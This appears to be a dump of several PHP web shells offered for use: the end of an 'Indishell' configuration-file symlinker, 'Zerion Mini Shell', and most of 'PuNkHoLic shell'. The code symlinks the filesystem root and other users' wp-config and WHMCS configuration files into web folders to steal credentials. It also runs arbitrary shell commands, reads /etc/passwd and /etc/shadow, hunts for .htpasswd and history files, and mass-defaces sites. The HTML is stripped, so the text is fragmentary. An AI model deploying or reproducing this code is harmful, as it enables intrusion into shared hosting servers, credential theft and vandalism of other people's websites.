Welcome Bhai ji :) .. Configuration file killer welcomes you _/\_
|
151 |
153 |
155 |
156 |
open this link in new tab to run PHP.INI";
164 | echo $link;
165 |
166 | }
167 |
168 |
169 |
170 | ?>
171 |
172 |
173 |
185 |
186 | ";
189 | if(isset($_POST['su']))
190 | {
191 | mkdir('Indishell',0777);
192 | $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
193 | $g = fopen('Indishell/.htaccess','w');
194 | fwrite($g,$rr);
195 | $indishell = symlink("/","Indishell/root");
196 | $rt="
OwN3d";
197 | echo "Bhai ji .... check link given below for / folder symlink
$rt";
198 |
199 | $dir=mkdir('INDISHELL',0777);
200 | $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
201 | $f = fopen('INDISHELL/.htaccess','w');
202 |
203 | fwrite($f,$r);
204 | $consym="
configuration files";
205 | echo "
The link given below for configuration file symlink...open it, once processing finish
$consym";
206 |
207 | $usr=explode("\n",$_POST['user']);
208 | $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
209 | foreach($usr as $uss )
210 | {
211 | $us=trim($uss);
212 |
213 | foreach($configuration as $c)
214 | {
215 | $rs="/home/".$us."/public_html/".$c;
216 | $r="INDISHELL/".$us.$c;
217 | symlink($rs,$r);
218 |
219 | }
220 |
221 | }
222 |
223 |
224 | }
225 |
226 |
227 |
228 | ?>
229 |
--------------------------------------------------------------------------------
/PHP/mini.php:
--------------------------------------------------------------------------------
1 | $value){
7 | $_POST[$key] = stripslashes($value);
8 | }
9 | }
10 | echo '
11 |
12 |
13 |
14 |
Mini Shell
15 |
53 |
54 |
55 |
56 | Mini Shell
57 |
58 |
';
102 | echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
');
103 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
104 | echo '
'.$_POST['path'].'
';
105 | if($_POST['opt'] == 'chmod'){
106 | if(isset($_POST['perm'])){
107 | if(chmod($_POST['path'],$_POST['perm'])){
108 | echo 'Change Permission Done.
';
109 | }else{
110 | echo 'Change Permission Error.
';
111 | }
112 | }
113 | echo '';
119 | }elseif($_POST['opt'] == 'rename'){
120 | if(isset($_POST['newname'])){
121 | if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
122 | echo 'Change Name Done.
';
123 | }else{
124 | echo 'Change Name Error.
';
125 | }
126 | $_POST['name'] = $_POST['newname'];
127 | }
128 | echo '';
134 | }elseif($_POST['opt'] == 'edit'){
135 | if(isset($_POST['src'])){
136 | $fp = fopen($_POST['path'],'w');
137 | if(fwrite($fp,$_POST['src'])){
138 | echo 'Edit File Done ~_^.
';
139 | }else{
140 | echo 'Edit File Error ~_~.
';
141 | }
142 | fclose($fp);
143 | }
144 | echo '';
150 | }
151 | echo '';
152 | }else{
153 | echo '
';
154 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
155 | if($_POST['type'] == 'dir'){
156 | if(rmdir($_POST['path'])){
157 | echo 'Delete Dir Done.
';
158 | }else{
159 | echo 'Delete Dir Error.
';
160 | }
161 | }elseif($_POST['type'] == 'file'){
162 | if(unlink($_POST['path'])){
163 | echo 'Delete File Done.
';
164 | }else{
165 | echo 'Delete File Error.
';
166 | }
167 | }
168 | }
169 | echo '';
170 | $scandir = scandir($path);
171 | echo '
';
243 | }
244 | echo '
Zerion Mini Shell 1.0
245 |
246 | ';
247 | function perms($file){
248 | $perms = fileperms($file);
249 |
250 | if (($perms & 0xC000) == 0xC000) {
251 |
252 | // Socket
253 | $info = 's';
254 | } elseif (($perms & 0xA000) == 0xA000) {
255 | // Symbolic Link
256 | $info = 'l';
257 | } elseif (($perms & 0x8000) == 0x8000) {
258 | // Regular
259 | $info = '-';
260 | } elseif (($perms & 0x6000) == 0x6000) {
261 | // Block special
262 | $info = 'b';
263 | } elseif (($perms & 0x4000) == 0x4000) {
264 | // Directory
265 | $info = 'd';
266 | } elseif (($perms & 0x2000) == 0x2000) {
267 | // Character special
268 | $info = 'c';
269 | } elseif (($perms & 0x1000) == 0x1000) {
270 | // FIFO pipe
271 | $info = 'p';
272 | } else {
273 | // Unknown
274 | $info = 'u';
275 | }
276 |
277 | // Owner
278 | $info .= (($perms & 0x0100) ? 'r' : '-');
279 | $info .= (($perms & 0x0080) ? 'w' : '-');
280 | $info .= (($perms & 0x0040) ?
281 | (($perms & 0x0800) ? 's' : 'x' ) :
282 | (($perms & 0x0800) ? 'S' : '-'));
283 |
284 |
285 | // Group
286 | $info .= (($perms & 0x0020) ? 'r' : '-');
287 | $info .= (($perms & 0x0010) ? 'w' : '-');
288 | $info .= (($perms & 0x0008) ?
289 | (($perms & 0x0400) ? 's' : 'x' ) :
290 | (($perms & 0x0400) ? 'S' : '-'));
291 |
292 | // World
293 | $info .= (($perms & 0x0004) ? 'r' : '-');
294 | $info .= (($perms & 0x0002) ? 'w' : '-');
295 |
296 | $info .= (($perms & 0x0001) ?
297 | (($perms & 0x0200) ? 't' : 'x' ) :
298 | (($perms & 0x0200) ? 'T' : '-'));
299 |
300 | return $info;
301 | }
302 | ?>
303 |
--------------------------------------------------------------------------------
/PHP/punk-nopass.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
PuNkHoLic shell
4 |
5 |
6 |
43 |
44 |
45 |
46 | "dir",
75 | "Find index.php in current dir" => "dir /s /w /b index.php",
76 | "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
77 | "Show active connections" => "netstat -an",
78 | "Show running services" => "net start",
79 | "User accounts" => "net user",
80 | "Show computers" => "net view",
81 | "ARP Table" => "arp -a",
82 | "IP Configuration" => "ipconfig /all"
83 | );
84 | }
85 | else{
86 | $aliases = array(
87 | "List dir" => "ls -la",
88 | "list file attributes on a Linux second extended file system" => "lsattr -va",
89 | "show opened ports" => "netstat -an | grep -i listen",
90 | "Find" => "",
91 | "find all suid files" => "find / -type f -perm -04000 -ls",
92 | "find suid files in current dir" => "find . -type f -perm -04000 -ls",
93 | "find all sgid files" => "find / -type f -perm -02000 -ls",
94 | "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
95 | "find config.inc.php files" => "find / -type f -name config.inc.php",
96 | "find config* files" => "find / -type f -name \"config*\"",
97 | "find config* files in current dir" => "find . -type f -name \"config*\"",
98 | "find all writable folders and files" => "find / -perm -2 -ls",
99 | "find all writable folders and files in current dir" => "find . -perm -2 -ls",
100 | "find all service.pwd files" => "find / -type f -name service.pwd",
101 | "find service.pwd files in current dir" => "find . -type f -name service.pwd",
102 | "find all .htpasswd files" => "find / -type f -name .htpasswd",
103 | "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
104 | "find all .bash_history files" => "find / -type f -name .bash_history",
105 | "find .bash_history files in current dir" => "find . -type f -name .bash_history",
106 | "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
107 | "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
108 | "Locate" => "",
109 | "locate httpd.conf files" => "locate httpd.conf",
110 | "locate vhosts.conf files" => "locate vhosts.conf",
111 | "locate proftpd.conf files" => "locate proftpd.conf",
112 | "locate psybnc.conf files" => "locate psybnc.conf",
113 | "locate my.conf files" => "locate my.conf",
114 | "locate admin.php files" =>"locate admin.php",
115 | "locate cfg.php files" => "locate cfg.php",
116 | "locate conf.php files" => "locate conf.php",
117 | "locate config.dat files" => "locate config.dat",
118 | "locate config.php files" => "locate config.php",
119 | "locate config.inc files" => "locate config.inc",
120 | "locate config.inc.php" => "locate config.inc.php",
121 | "locate config.default.php files" => "locate config.default.php",
122 | "locate config* files " => "locate config",
123 | "locate .conf files"=>"locate '.conf'",
124 | "locate .pwd files" => "locate '.pwd'",
125 | "locate .sql files" => "locate '.sql'",
126 | "locate .htpasswd files" => "locate '.htpasswd'",
127 | "locate .bash_history files" => "locate '.bash_history'",
128 | "locate .mysql_history files" => "locate '.mysql_history'",
129 | "locate .fetchmailrc files" => "locate '.fetchmailrc'",
130 | "locate backup files" => "locate backup",
131 | "locate dump files" => "locate dump",
132 | "locate priv files" => "locate priv"
133 | );
134 | }
135 | if(isset($_POST['p1']) && $_POST['p1']=='deface') {
136 | $def = file_get_contents($deface_url);
137 | file_put_contents($_POST['c'].$_POST['p2'],$def);
138 | }
139 | function ex($in) {
140 | $out = '';
141 | if ( function_exists(' exec ')) {
142 | @exec($in,$out);
143 | $out = @join("\n",$out);
144 | }elseif(function_exists('passthru')) {
145 | ob_start();
146 | @passthru($in);
147 | $out = ob_get_clean();
148 | }elseif(function_exists('system')) {
149 | ob_start();
150 | @system($in);
151 | $out = ob_get_clean();
152 | }elseif(function_exists('shell_exec')) {
153 | $out = shell_exec($in);
154 | }elseif(is_resource($f = @popen($in,"r"))) {
155 | $out = "";
156 | while(!@feof($f))
157 | $out .= fread($f,1024);
158 | pclose($f);
159 | }
160 | return $out;
161 | }
162 | function which($p) {
163 | $path = ex('which '.$p);
164 | if(!empty($path))
165 | return $path;
166 | return false;
167 | }
168 | function printHeader() {
169 | if(empty($_POST['charset']))
170 | $_POST['charset'] = "UTF-8";
171 | global $color;
172 | global $Theme;
173 | global $TabsColor;
174 | echo "
";
175 | echo '
176 |
PuNkHoLic Shell
177 |
227 |
228 |

229 |
278 |
279 |
';
287 | $freeSpace = @diskfreespace($GLOBALS['cwd']);
288 | $totalSpace = @disk_total_space($GLOBALS['cwd']);
289 | $totalSpace = $totalSpace?$totalSpace:1;
290 | $disable_functions = @ini_get('disable_functions');
291 | $release = @php_uname('r');
292 | $kernel = @php_uname('s');
293 | if(!function_exists('posix_getegid')) {
294 | $user = @get_current_user();
295 | $uid = @getmyuid();
296 | $gid = @getmygid();
297 | $group = "?";
298 | } else {
299 | $uid = @posix_getpwuid(@posix_geteuid());
300 | $gid = @posix_getgrgid(@posix_getegid());
301 | $user = $uid['name'];
302 | $uid = $uid['uid'];
303 | $group = $gid['name'];
304 | $gid = $gid['gid'];
305 | }
306 | $cwd_links = '';
307 | $path = explode("/", $GLOBALS['cwd']);
308 | $n=count($path);
309 | for($i=0;$i<$n-1;$i++) {
310 | $cwd_links .= "
".$path[$i]."/";
314 | }
315 | $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
316 | $opt_charsets = '';
317 | foreach($charsets as $item)
318 | $opt_charsets .= '
';
319 | $m = array('Import Scripts'=>'ImportScripts','Jumping'=>'Jumping','Symlink'=>'Symlink','Domains' => 'Domain','Shared Hostings'=>'Shared','Sym Sites'=>'Sym','Subdomain'=>'Subdomain','Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Safe Mode'=>'Bypass','String tools'=>'StringTools','Defacer' => 'Deface','Recursive Defacer'=>'Defacer');
320 | if(!empty($GLOBALS['auth_pass']))
321 | $m['Logout'] = 'Logout';
322 | $menu = '';
323 | foreach($m as $k => $v)
324 | $menu .= '
'.$k.' | ';
325 | $drives = "";
326 | if ($GLOBALS['os'] == 'win') {
327 | foreach( range('a','z') as $drive ){
328 | if (is_dir($drive.':\\'))
329 | $drives .= '
[ '.$drive.' ] ';
330 | }
331 | $drives .= '
: ';
332 | }
333 | if($GLOBALS['os'] == 'nix') {
334 | $dominios = @file_get_contents("/etc/named.conf");
335 | if(!$dominios) {
336 | $DomainS = "/var/named";
337 | $Domainonserver = scandir($DomainS);
338 | $d0c = count($Domainonserver);
339 | } else {
340 | @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
341 | $out = sizeof(array_unique($out[1]));
342 | $d0c = $out."Domains";
343 | }
344 | } else {
345 | $d0c = "Nothing here bro:(";
346 | }
347 | if($GLOBALS['os'] == 'nix' )
348 | {
349 | $usefl = ''; $dwnldr = '';
350 | if(!@ini_get('safe_mode')) {
351 | $temp = array();
352 | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
353 | foreach($userful as $item) { if(which($item)) $temp[]= $item; }
354 | $usefl = implode(', ',$temp);
355 | $temp = array();
356 | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
357 | foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
358 | $dwnldr = implode(', ',$temp);
359 | } else {
360 | $usefl = ' ------- '; $dwnldr = ' ------- ';
361 | }
362 | } else {
363 | $usefl = ' ------- '; $dwnldr = ' ------- ';
364 | }
365 | echo '
366 | Uname | : '.substr(@php_uname(), 0, 120).' |
367 | User | : '.$uid.' ( '.$user.' ) Group: '.$gid.' ( '.$group.' ) | Server | : '.@getenv('SERVER_SOFTWARE').' | Useful | : '.$usefl.' | Downloaders | : '.$dwnldr.' | D/functions | : '.($disable_functions?$disable_functions:'All Function Enable').' | '.($GLOBALS['os'] == 'win'?'Drives Cwd':'Cwd').' | : '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ] |
| '.
368 | 'Sv IP Your IP HDD Free PHP Safe Mode Domains | '.
369 | ': '.gethostbyname($_SERVER["HTTP_HOST"]).' : '.$_SERVER['REMOTE_ADDR'].' : '.viewSize($totalSpace).' : '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%) : '.@phpversion().' [ phpinfo ] : '.($GLOBALS['safe_mode']?'ON':'OFF').' : '.$d0c.' |
'.
370 | '
';
371 | }
372 | function printFooter() {
373 | $is_writable = is_writable($GLOBALS['cwd'])?"[ Writeable ]":"[ Not writable ]";
374 | echo '
394 |
395 |
396 | ';
397 | }
398 | if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
399 | if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
400 | function viewSize($s) {
401 | if($s >= 1073741824)
402 | return sprintf('%1.2f', $s / 1073741824 ). ' GB';
403 | elseif($s >= 1048576)
404 | return sprintf('%1.2f', $s / 1048576 ) . ' MB';
405 | elseif($s >= 1024)
406 | return sprintf('%1.2f', $s / 1024 ) . ' KB';
407 | else
408 | return $s . ' B';
409 | }
410 | function perms($p) {
411 | if (($p & 0xC000) == 0xC000)$i = 's';
412 | elseif (($p & 0xA000) == 0xA000)$i = 'l';
413 | elseif (($p & 0x8000) == 0x8000)$i = '-';
414 | elseif (($p & 0x6000) == 0x6000)$i = 'b';
415 | elseif (($p & 0x4000) == 0x4000)$i = 'd';
416 | elseif (($p & 0x2000) == 0x2000)$i = 'c';
417 | elseif (($p & 0x1000) == 0x1000)$i = 'p';
418 | else $i = 'u';
419 | $i .= (($p & 0x0100) ? 'r' : '-');
420 | $i .= (($p & 0x0080) ? 'w' : '-');
421 | $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
422 | $i .= (($p & 0x0020) ? 'r' : '-');
423 | $i .= (($p & 0x0010) ? 'w' : '-');
424 | $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
425 | $i .= (($p & 0x0004) ? 'r' : '-');
426 | $i .= (($p & 0x0002) ? 'w' : '-');
427 | $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
428 | return $i;
429 | }
430 | function viewPermsColor($f) {
431 | if (!@is_readable($f))
432 | return '
'.perms(@fileperms($f)).'';
433 | elseif (!@is_writable($f))
434 | return '
'.perms(@fileperms($f)).'';
435 | else
436 | return '
'.perms(@fileperms($f)).'';
437 | }
438 | if(!function_exists("scandir")) {
439 | function scandir($dir) {
440 | $dh= opendir($dir);
441 | while (false !== ($filename = readdir($dh))) {
442 | $files[] = $filename;
443 | }
444 | return $files;
445 | }
446 | }
447 | function actionSecInfo() {
448 | printHeader();
449 | echo '
Server security information
';
450 | function showSecParam($n, $v) {
451 | $v = trim($v);
452 | if($v) {
453 | echo '
'.$n.': ';
454 | if(strpos($v, "\n") === false)
455 | echo $v.'
';
456 | else
457 | echo '
'.$v.'
';
458 | }
459 | }
460 | showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
461 | showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
462 | showSecParam('Open base dir', @ini_get('open_basedir'));
463 | showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
464 | showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
465 | showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
466 | $temp=array();
467 | if(function_exists('mysql_get_client_info'))
468 | $temp[] = "MySql (".mysql_get_client_info().")";
469 | if(function_exists('mssql_connect'))
470 | $temp[] = "MSSQL";
471 | if(function_exists('pg_connect'))
472 | $temp[] = "PostgreSQL";
473 | if(function_exists('oci_connect'))
474 | $temp[] = "Oracle";
475 | showSecParam('Supported databases', implode(', ', $temp));
476 | echo '
';
477 | if( $GLOBALS['os'] == 'nix' ) {
478 | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
479 | $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
480 | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
481 | showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes
[view]":'no');
482 | showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes
[view]":'no');
483 | showSecParam('OS version', @file_get_contents('/proc/version'));
484 | showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
485 | if(!$GLOBALS['safe_mode']) {
486 | echo '
';
487 | $temp=array();
488 | foreach ($userful as $item)
489 | if(which($item)){$temp[]=$item;}
490 | showSecParam('Userful', implode(', ',$temp));
491 | $temp=array();
492 | foreach ($danger as $item)
493 | if(which($item)){$temp[]=$item;}
494 | showSecParam('Danger', implode(', ',$temp));
495 | $temp=array();
496 | foreach ($downloaders as $item)
497 | if(which($item)){$temp[]=$item;}
498 | showSecParam('Downloaders', implode(', ',$temp));
499 | echo '
';
500 | showSecParam('Hosts', @file_get_contents('/etc/hosts'));
501 | showSecParam('HDD space', ex('df -h'));
502 | showSecParam('Mount options', @file_get_contents('/etc/fstab'));
503 | }
504 | } else {
505 | showSecParam('OS Version',ex('ver'));
506 | showSecParam('Account Settings',ex('net accounts'));
507 | showSecParam('User Accounts',ex('net user'));
508 | }
509 | echo '
';
510 | printFooter();
511 | }
512 | function actionFilesMan() {
513 | printHeader();
514 | echo '
File manager
';
515 | if(isset($_POST['p1']) && $_POST['p1']!='deface') {
516 | switch($_POST['p1']) {
517 | case 'uploadFile':
518 | if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
519 | echo "Can't upload file!";
520 | break;
521 | break;
522 | case 'mkdir':
523 | if(!@mkdir($_POST['p2']))
524 | echo "Can't create new dir";
525 | break;
526 | case 'delete':
527 | function deleteDir($path) {
528 | $path = (substr($path,-1)=='/') ? $path:$path.'/';
529 | $dh= opendir($path);
530 | while ( ($item = readdir($dh) ) !== false) {
531 | $item = $path.$item;
532 | if ( (basename($item) == "..") || (basename($item) == ".") )
533 | continue;
534 | $type = filetype($item);
535 | if ($type == "dir")
536 | deleteDir($item);
537 | else
538 | @unlink($item);
539 | }
540 | closedir($dh);
541 | rmdir($path);
542 | }
543 | if(is_array(@$_POST['f']))
544 | foreach($_POST['f'] as $f) {
545 | $f = urldecode($f);
546 | if(is_dir($f))
547 | deleteDir($f);
548 | else
549 | @unlink($f);
550 | }
551 | break;
552 | case 'paste':
553 | if($_SESSION['act'] == 'copy') {
554 | function copy_paste($c,$s,$d){
555 | if(is_dir($c.$s)){
556 | mkdir($d.$s);
557 | $h = opendir($c.$s);
558 | while (($f = readdir($h)) !== false)
559 | if (($f != ".") and ($f != "..")) {
560 | copy_paste($c.$s.'/',$f, $d.$s.'/');
561 | }
562 | } elseif(is_file($c.$s)) {
563 | @copy($c.$s, $d.$s);
564 | }
565 | }
566 | foreach($_SESSION['f'] as $f)
567 | copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
568 | } elseif($_SESSION['act'] == 'move') {
569 | function move_paste($c,$s,$d){
570 | if(is_dir($c.$s)){
571 | mkdir($d.$s);
572 | $h = opendir($c.$s);
573 | while (($f = readdir($h)) !== false)
574 | if (($f != ".") and ($f != "..")) {
575 | copy_paste($c.$s.'/',$f, $d.$s.'/');
576 | }
577 | } elseif(is_file($c.$s)) {
578 | @copy($c.$s, $d.$s);
579 | }
580 | }
581 | foreach($_SESSION['f'] as $f)
582 | @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
583 | }
584 | unset($_SESSION['f']);
585 | break;
586 | default:
587 | if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
588 | $_SESSION['act'] = @$_POST['p1'];
589 | $_SESSION['f'] = @$_POST['f'];
590 | foreach($_SESSION['f'] as $k => $f)
591 | $_SESSION['f'][$k] = urldecode($f);
592 | $_SESSION['cwd'] = @$_POST['c'];
593 | }
594 | break;
595 | }
596 | echo '';
597 | }
598 | $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
599 | if($dirContent === false) {echo 'Can\'t open this folder!'; return;}
600 | global $sort;
601 | $sort = array('name', 1);
602 | if(!empty($_POST['p1'])) {
603 | if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
604 | $sort = array($match[1], (int)$match[2]);
605 | }
606 | echo '
613 |
614 |
';
661 | printFooter();
662 | }
663 | function actionStringTools() {
664 | if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
665 | if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i
String conversions';
679 | $stringTools = array(
680 | 'Base64 encode' => 'base64_encode',
681 | 'Base64 decode' => 'base64_decode',
682 | 'Url encode' => 'urlencode',
683 | 'Url decode' => 'urldecode',
684 | 'Full urlencode' => 'full_urlencode',
685 | 'md5 hash' => 'md5',
686 | 'sha1 hash' => 'sha1',
687 | 'crypt' => 'crypt',
688 | 'CRC32' => 'crc32',
689 | 'ASCII to HEX' => 'ascii2hex',
690 | 'HEX to ASCII' => 'hex2ascii',
691 | 'HEX to DEC' => 'hexdec',
692 | 'HEX to BIN' => 'hex2bin',
693 | 'DEC to HEX' => 'dechex',
694 | 'DEC to BIN' => 'decbin',
695 | 'BIN to HEX' => 'bin2hex',
696 | 'BIN to DEC' => 'bindec',
697 | 'String to lower case' => 'strtolower',
698 | 'String to upper case' => 'strtoupper',
699 | 'Htmlspecialchars' => 'htmlspecialchars',
700 | 'String length' => 'strlen',
701 | );
702 | if(empty($_POST['ajax'])&&!empty($_POST['p1']))
703 | $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
704 | echo "
";
708 | if(!empty($_POST['p1'])) {
709 | if(function_exists($_POST['p1']))
710 | echo htmlspecialchars($_POST['p1']($_POST['p2']));
711 | }
712 | echo"
";
713 | printFooter();
714 | }
715 | function actionFilesTools() {
716 | if( isset($_POST['p1']) )
717 | $_POST['p1'] = urldecode($_POST['p1']);
718 | if(@$_POST['p2']=='download') {
719 | if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
720 | ob_start("ob_gzhandler", 4096);
721 | header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
722 | if (function_exists("mime_content_type")) {
723 | $type = @mime_content_type($_POST['p1']);
724 | header("Content-Type: ".$type);
725 | }
726 | $fp = @fopen($_POST['p1'], "r");
727 | if($fp) {
728 | while(!@feof($fp))
729 | echo @fread($fp, 1024);
730 | fclose($fp);
731 | }
732 | } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
733 | }
734 | exit;
735 | }
736 | if( @$_POST['p2'] == 'mkfile' ) {
737 | if(!file_exists($_POST['p1'])) {
738 | $fp = @fopen($_POST['p1'], 'w');
739 | if($fp) {
740 | $_POST['p2'] = "edit";
741 | fclose($fp);
742 | }
743 | }
744 | }
745 | printHeader();
746 | echo 'File tools
';
747 | if( !file_exists(@$_POST['p1']) ) {
748 | echo 'File not exists';
749 | printFooter();
750 | return;
751 | }
752 | $uid = @posix_getpwuid(@fileowner($_POST['p1']));
753 | $gid = @posix_getgrgid(@fileowner($_POST['p1']));
754 | echo '
Name: '.htmlspecialchars($_POST['p1']).'
Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').'
Permission: '.viewPermsColor($_POST['p1']).'
Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
755 | echo '
Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).'
Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).'
Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'
';
756 | if( empty($_POST['p2']) )
757 | $_POST['p2'] = 'view';
758 | if( is_file($_POST['p1']) )
759 | $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
760 | else
761 | $m = array('Chmod', 'Rename', 'Touch');
762 | foreach($m as $v)
763 | echo '
'.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';
764 | echo '
';
765 | switch($_POST['p2']) {
766 | case 'view':
767 | echo '
';
768 | $fp = @fopen($_POST['p1'], 'r');
769 | if($fp) {
770 | while( !@feof($fp) )
771 | echo htmlspecialchars(@fread($fp, 1024));
772 | @fclose($fp);
773 | }
774 | echo '
';
775 | break;
776 | case 'highlight':
777 | if( is_readable($_POST['p1']) ) {
778 | echo '
';
779 | $code = highlight_file($_POST['p1'],true);
780 | echo str_replace(array(''), array(''),$code).'
';
781 | }
782 | break;
783 | case 'chmod':
784 | if( !empty($_POST['p3']) ) {
785 | $perms = 0;
786 | for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
787 | $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
788 | if(!@chmod($_POST['p1'], $perms))
789 | echo 'Can\'t set permissions!
';
790 | else
791 | die('');
792 | }
793 | echo '
';
794 | break;
795 | case 'edit':
796 | if( !is_writable($_POST['p1'])) {
797 | echo 'File isn\'t writeable';
798 | break;
799 | }
800 | if( !empty($_POST['p3']) ) {
801 | @file_put_contents($_POST['p1'],$_POST['p3']);
802 | echo 'Saved!
';
803 | }
804 | echo '
';
812 | break;
813 | case 'hexdump':
814 | $c = @file_get_contents($_POST['p1']);
815 | $n = 0;
816 | $h = array('00000000
','','');
817 | $len = strlen($c);
818 | for ($i=0; $i<$len; ++$i) {
819 | $h[1] .= sprintf('%02X',ord($c[$i])).' ';
820 | switch ( ord($c[$i]) ) {
821 | case 0:$h[2] .= ' '; break;
822 | case 9:$h[2] .= ' '; break;
823 | case 10: $h[2] .= ' '; break;
824 | case 13: $h[2] .= ' '; break;
825 | default: $h[2] .= $c[$i]; break;
826 | }
827 | $n++;
828 | if ($n == 32) {
829 | $n = 0;
830 | if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';}
831 | $h[1] .= '
';
832 | $h[2] .= "\n";
833 | }
834 | }
835 | echo '
'.$h[0].' | '.$h[1].' | '.htmlspecialchars($h[2]).' |
';
836 | break;
837 | case 'rename':
838 | if( !empty($_POST['p3']) ) {
839 | if(!@rename($_POST['p1'], $_POST['p3']))
840 | echo 'Can\'t rename!
';
841 | else
842 | die('');
843 | }
844 | echo '
';
845 | break;
846 | case 'touch':
847 | if( !empty($_POST['p3']) ) {
848 | $time = strtotime($_POST['p3']);
849 | if($time) {
850 | if(@touch($_POST['p1'],$time,$time))
851 | die('');
852 | else {
853 | echo 'Fail!';
854 | }
855 | } else echo 'Bad time format!';
856 | }
857 | echo '
';
858 | break;
859 | case 'mkfile':
860 | break;
861 | }
862 | echo '
';
863 | printFooter();
864 | }
865 | function actionDefacer() {
866 | printHeader();
867 | echo "Recursive Mass Defacer
';
899 | printFooter();
900 | }
901 | function actionConsole() {
902 | if(isset($_POST['ajax'])) {
903 | $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
904 | ob_start();
905 | echo "document.cf.cmd.value='';\n";
906 | $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
907 | if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)){
908 | if(@chdir($match[1])) {
909 | $GLOBALS['cwd'] = @getcwd();
910 | echo "document.mf.c.value='".$GLOBALS['cwd']."';";
911 | }
912 | }
913 | echo "document.cf.output.value+='".$temp."';";
914 | echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
915 | $temp = ob_get_clean();
916 | echo strlen($temp), "\n", $temp;
917 | exit;
918 | }
919 | printHeader();
920 | echo '';
947 | echo 'Console
';
963 | printFooter();
964 | }
965 | function actionLogout() {
